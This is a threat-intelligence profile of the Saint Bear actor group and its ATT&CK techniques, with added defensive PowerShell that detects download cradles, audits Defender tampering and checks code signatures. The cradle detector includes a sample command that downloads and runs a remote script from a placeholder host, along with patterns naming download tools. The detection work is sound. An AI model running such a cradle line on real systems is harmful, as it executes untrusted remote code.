
Saint Bear

Saint Bear is a Russian-nexus threat actor active since early 2021, primarily targeting entities in Ukraine and Georgia. The group is notable for its use of a specific remote access tool, Saint Bot, and an information stealer, OutSteel, in its campaigns. Saint Bear typically relies on phishing or web staging of malicious documents and related file types for initial access, spoofing government or related entities. (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)(Citation: Cadet Blizzard emerges as novel threat actor) Saint Bear has previously been confused with Ember Bear operations, but analysis of behaviors, tools, and targeting indicates these are distinct clusters.
ID: G1031
Associated Groups: Storm-0587, TA471, UAC-0056, Lorec53
Created: 25 May 2024
Last Modified: 12 Aug 2024

Associated Group Descriptions

Name: Description
Storm-0587: (Citation: Cadet Blizzard emerges as novel threat actor)
TA471: (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)
UAC-0056: (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)
Lorec53: (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)

Techniques Used

Domain / ID / Name / Use

Enterprise T1583.006 Acquire Infrastructure: Web Services

Saint Bear has leveraged the Discord content delivery network to host malicious content for retrieval during initial access operations. (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)

Enterprise T1059.001 Command and Scripting Interpreter: PowerShell

Saint Bear relies extensively on PowerShell execution from malicious attachments and related content to retrieve and execute follow-on payloads. (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)
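The retrieve-and-execute pattern described above shows up in PowerShell Script Block Logging (Event ID 4104) as a block that both fetches remote content and hands it to an execution primitive. The following PowerShell is an added detection example for defenders; it is not code from the ATT&CK page or from the Unit 42 report. The regex patterns, the function names and the sample script block texts are constructed for illustration; the live query assumes Script Block Logging is enabled on the host.

```powershell
# Added example (not from the ATT&CK page or the cited reports): score a PowerShell
# script block as a download cradle when it both fetches remote content and executes it.
function Test-DownloadCradle {
    param([Parameter(Mandatory)][string]$ScriptBlockText)

    # Constructed pattern lists; -match is case-insensitive in PowerShell by default.
    $download = 'DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer|\bcurl\b|\bwget\b'
    $execute  = 'Invoke-Expression|\biex\b|Start-Process|-EncodedCommand|\s-e(nc|c)?\s'

    $hits = @()
    if ($ScriptBlockText -match $download) { $hits += 'download' }
    if ($ScriptBlockText -match $execute)  { $hits += 'execute' }

    # Only a block that both downloads and executes is reported as a cradle; a plain
    # Invoke-WebRequest or a plain Start-Process alone is too noisy to alert on.
    [pscustomobject]@{
        IsCradle = ($hits.Count -eq 2)
        Matched  = ($hits -join ',')
        Snippet  = $ScriptBlockText.Substring(0, [Math]::Min(80, $ScriptBlockText.Length))
    }
}

# Live use: read 4104 events from the PowerShell operational log. For 4104, the
# event's Properties[2] holds the ScriptBlockText field.
function Get-CradleEvents {
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $r = Test-DownloadCradle -ScriptBlockText $_.Properties[2].Value
            if ($r.IsCradle) { $r | Add-Member -NotePropertyName TimeCreated -NotePropertyValue $_.TimeCreated -PassThru }
        }
}

# Offline check on constructed samples: the first is a cradle, the second is benign admin activity.
$samples = @(
    'IEX (New-Object Net.WebClient).DownloadString("https://example.invalid/stage2.ps1")',
    'Get-ChildItem C:\Users | Measure-Object'
)
$samples | ForEach-Object { Test-DownloadCradle -ScriptBlockText $_ }
```

On a host where Script Block Logging is on, run Get-CradleEvents and review every IsCradle hit; blocks that are split across several 4104 events (MessageNumber/MessageTotal greater than 1) should be concatenated by ScriptBlockId before scoring, which the example omits for brevity.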

Enterprise T1059.003 Command and Scripting Interpreter: Windows Command Shell

Saint Bear initial loaders will also drop a malicious Windows batch file, available via open source GitHub repositories, that disables Microsoft Defender functionality. (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)

Enterprise T1059.007 Command and Scripting Interpreter: JavaScript

Saint Bear has delivered malicious Microsoft Office files containing an embedded JavaScript object that would, on execution, download and execute OutSteel and Saint Bot. (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)

Enterprise T1589.002 Gather Victim Identity Information: Email Addresses

Saint Bear gathered victim email information in advance of phishing operations for targeted attacks. (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)

Enterprise T1562.001 Impair Defenses: Disable or Modify Tools

Saint Bear will modify registry entries and scheduled task objects associated with Windows Defender to disable its functionality. (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)
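A defender can audit for exactly the two kinds of tampering named above, Defender policy values in the registry and the Defender scheduled tasks, and cross-check them against the live protection status. The PowerShell below is an added example written for this page; it is not code from ATT&CK or from the cited reports and does not reproduce the actor's batch file. It uses the documented Defender policy value names and the standard Get-ItemProperty, Get-ScheduledTask and Get-MpComputerStatus cmdlets; the function name is an assumption.

```powershell
# Added example (not from the ATT&CK page or the cited reports): collect evidence that
# Windows Defender has been switched off through policy registry values or its scheduled tasks.
function Get-DefenderTamperFindings {
    $findings = @()

    # Documented Defender policy values; a value of 1 disables the named component.
    $policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    $checks = @(
        @{ Path = $policyRoot;                         Name = 'DisableAntiSpyware' },
        @{ Path = $policyRoot;                         Name = 'DisableAntiVirus' },
        @{ Path = "$policyRoot\Real-Time Protection";  Name = 'DisableRealtimeMonitoring' },
        @{ Path = "$policyRoot\Real-Time Protection";  Name = 'DisableBehaviorMonitoring' },
        @{ Path = "$policyRoot\Real-Time Protection";  Name = 'DisableOnAccessProtection' }
    )
    foreach ($c in $checks) {
        $v = (Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue).($c.Name)
        if ($v -eq 1) {
            $findings += [pscustomobject]@{ Type = 'Registry'; Item = "$($c.Path)\$($c.Name)"; Detail = 'set to 1' }
        }
    }

    # Defender's own maintenance and scan tasks normally sit in the Ready state, not Disabled.
    Get-ScheduledTask -TaskPath '\Microsoft\Windows\Windows Defender\' -ErrorAction SilentlyContinue |
        Where-Object { $_.State -eq 'Disabled' } |
        ForEach-Object {
            $findings += [pscustomobject]@{ Type = 'ScheduledTask'; Item = $_.TaskName; Detail = 'Disabled' }
        }

    # Cross-check against the running engine where the Defender module is available.
    $status = Get-MpComputerStatus -ErrorAction SilentlyContinue
    if ($status -and -not $status.RealTimeProtectionEnabled) {
        $findings += [pscustomobject]@{ Type = 'Engine'; Item = 'RealTimeProtectionEnabled'; Detail = 'False' }
    }

    return $findings
}

# Usage: an empty result means none of the checked tamper indicators is present.
Get-DefenderTamperFindings | Format-Table -AutoSize
```

The registry half should be read together with the engine half: a policy value of 1 that is legitimately pushed by group policy (for example on a host running a third-party AV) will show the same way as actor tampering, so treat a hit as a lead to confirm against change records rather than as a verdict on its own.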

Enterprise T1027.002 Obfuscated Files or Information: Software Packing

Saint Bear clones .NET assemblies from other .NET binaries and clones code signing certificates from other software to obfuscate the initial loader payload. (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)

Enterprise T1027.013 Obfuscated Files or Information: Encrypted/Encoded File

Saint Bear initial payloads included encoded follow-on payloads located in the resources file of the first-stage loader. (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)

Enterprise T1566.001 Phishing: Spearphishing Attachment

Saint Bear uses a variety of file formats, such as Microsoft Office documents, ZIP archives, PDF documents, and other items as phishing attachments for initial access. (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)

Enterprise T1608.001 Stage Capabilities: Upload Malware

Saint Bear has used the Discord content delivery network for hosting malicious content referenced in links and emails. (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)

Enterprise T1553.002 Subvert Trust Controls: Code Signing

Saint Bear has used an initial loader malware featuring a legitimate code signing certificate associated with "Electrum Technologies GmbH." (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)
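The two signing-related behaviours on this page, cloned certificates on the loader (T1027.002 above) and a genuine but misapplied "Electrum Technologies GmbH" certificate (T1553.002), fail different checks: a cloned certificate produces a signature that does not verify or a chain that does not reach a trusted root, while a genuine certificate verifies fine and is only caught by asking whether that publisher belongs on this file at all. The PowerShell below is an added example for defenders, not code from ATT&CK or from the cited report; it relies on the standard Get-AuthenticodeSignature cmdlet and the X509Certificate2.Verify() method, and the function name and the ExpectedSigner parameter are assumptions made for the example.

```powershell
# Added example (not from the ATT&CK page or the cited reports): evaluate a binary's
# Authenticode signature on two axes, cryptographic validity and publisher plausibility.
function Test-LoaderSignature {
    param(
        [Parameter(Mandatory)][string]$Path,
        # Publisher names a file from this location or vendor is expected to carry (hypothetical input).
        [string[]]$ExpectedSigner = @()
    )

    $sig  = Get-AuthenticodeSignature -FilePath $Path
    $cert = $sig.SignerCertificate

    [pscustomobject]@{
        File          = $Path
        # Valid is the only passing status. HashMismatch means the signature blob was copied onto
        # a file it does not cover; NotTrusted or UnknownError means the chain does not end at a
        # trusted root, as with a look-alike certificate generated by the attacker.
        Status        = $sig.Status
        Signer        = if ($cert) { $cert.Subject } else { $null }
        Thumbprint    = if ($cert) { $cert.Thumbprint } else { $null }
        # Independent chain build; false for a cloned or self-made certificate.
        ChainTrusted  = if ($cert) { $cert.Verify() } else { $false }
        # A valid signature from the wrong publisher (the Electrum case) only fails this check.
        SignerMatches = if ($cert -and $ExpectedSigner.Count -gt 0) {
                            @($ExpectedSigner | Where-Object { $cert.Subject -like "*$_*" }).Count -gt 0
                        } else { $false }
    }
}

# Usage: sweep a download or attachment staging directory (path is a placeholder) and keep
# anything that either fails to verify or is signed by a publisher not on the expected list.
$stagingDir = 'C:\Quarantine\Review'   # placeholder path
Get-ChildItem -Path $stagingDir -Recurse -Include *.exe, *.dll -ErrorAction SilentlyContinue |
    ForEach-Object { Test-LoaderSignature -Path $_.FullName -ExpectedSigner @('Microsoft Corporation') } |
    Where-Object { $_.Status -ne 'Valid' -or -not $_.ChainTrusted -or -not $_.SignerMatches } |
    Format-Table File, Status, ChainTrusted, SignerMatches, Signer -AutoSize
```

The point of the second axis is that "signed and valid" is not a trust decision: a cryptographically sound signature from a cryptocurrency-wallet vendor on a document-themed loader is a finding, and only a comparison of the signer against what the file claims to be will surface it.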

Enterprise T1204.001 User Execution: Malicious Link

Saint Bear has, in addition to email-based phishing attachments, used malicious websites masquerading as legitimate entities to host links to malicious files for user execution. (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)(Citation: Cadet Blizzard emerges as novel threat actor)

Enterprise T1204.002 User Execution: Malicious File

Saint Bear relies on user interaction with, and execution of, malicious attachments and similar files for initial execution on victim systems. (Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022)
